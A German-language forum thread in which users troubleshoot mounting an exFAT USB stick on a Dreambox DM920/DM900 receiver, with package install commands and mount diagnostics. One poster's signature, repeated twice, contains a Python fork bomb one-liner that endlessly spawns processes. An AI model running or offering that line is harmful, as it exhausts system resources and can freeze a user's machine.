Wie kann ich es erreichen, dass ein USB Stick, der mit exFAT formatiert ist, auf der DM920 gelesen werden kann?
USB mit exFAT
-
-
exfat packages installieren
apt-get update
apt-get install fuse-exfat
apt-get install exfat-utils
rebootProbleme kann man niemals mit derselben Denkweise lösen.
¯\_(ツ)_/¯
"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen." -
Muss ich dann das zusätzlich noch irgendwo im Menü aktivieren?
Die Schritte oben hab ich gemacht, reboot auch, USB wird zwar wieder erkannt aber nicht gelesen. -
sollte glaube über /autofs/ gemounted werdenProbleme kann man niemals mit derselben Denkweise lösen.
¯\_(ツ)_/¯
"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen." -
Ein USB Stick muss gemountet sein, damit die Box ihn lesen kann?
-
Ja, ein mount ist das einbinden eines externen Dateisystems in das lokale Dateisystem. Vergleichbar mit den Laufwerksbuchstaben unter Windows.
Siehe auch: wiki.ubuntuusers.de/mount/
/autofs/ steht für sog. Automount, bei dem USB-Geräte automatisch gemounted werden. -
Funktioniert das automatische Einbinden einer exFAT Partition bei jemanden?
Ich hab's mal kurz mit der dm900 getestet, die exFAT Partition wird nach Installation der Pakete und reboot NICHT automatisch gemountet - also auch nicht in /autofs
ein manuelles mounten klappt auf herkömmlichen weg auch nicht
im Speichergerätemanager wird die exFAT Partiton als "Nicht unterstütztes Dateisystem" gemeldet
Quellcode
- root@dm900uhd:~# blkid|grep -i exfat
- /dev/sda9: UUID="6240-D48F" TYPE="exfat" PTTYPE="dos"
- root@dm900uhd:~# ls /autofs/
- sda1 sda2 sda3 sda5 sda6 sda7 sda8 sdb1
- root@dm900uhd:~# dpkg -l|grep exfat|awk '{print $2}'
- exfat-utils
- fuse-exfat
- root@dm900uhd:~# mount /dev/sda9 /tmp/exFAT/
- mount: unknown filesystem type 'exfat'
- root@dm900uhd:~# mount -t exfat /dev/sda9 /tmp/exFAT/
- mount: unknown filesystem type 'exfat'
- root@dm900uhd:~# cat /proc/filesystems|grep -i exfat
- root@dm900uhd:~#
über ein fstab Eintrag konnte ich die exFAT Partition auch noch nicht zum mounten bewegen ...
ging weder mit exfat noch fuseblk
bisher einzige Lösung die hier funktioniert hat:
so manuell mounten
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Fred Bogus Trumper ()
-
Bitte morgen noch mal testen.
-
Morgen sollte es normal funktionieren wie die anderen systeme auch.python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
Was hat sich denn morgen an meinem System geändert, wenn ich nicht irgendein Update durchführe?
-
-
Natürlich ist ein update deiner Box die Voraussetzung. Man muss halt ein bisschen zwischen den Zeilen lesen
. Aber dann erst ab Morgen, wenn der feed neu gebaut hat
.
-
-
Wie es aussieht war ich der Erste der es getestet hat bzw. der gemerkt das es nicht ganz so funktioniert wie es soll ...
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Fred Bogus Trumper ()
-
die Box ist ein Luder, alles reinstecken was geht...
-
-
-
Ist der feed neu gebaut worden nein dann können die updates nicht drauf sein oderpython -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
-
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0
-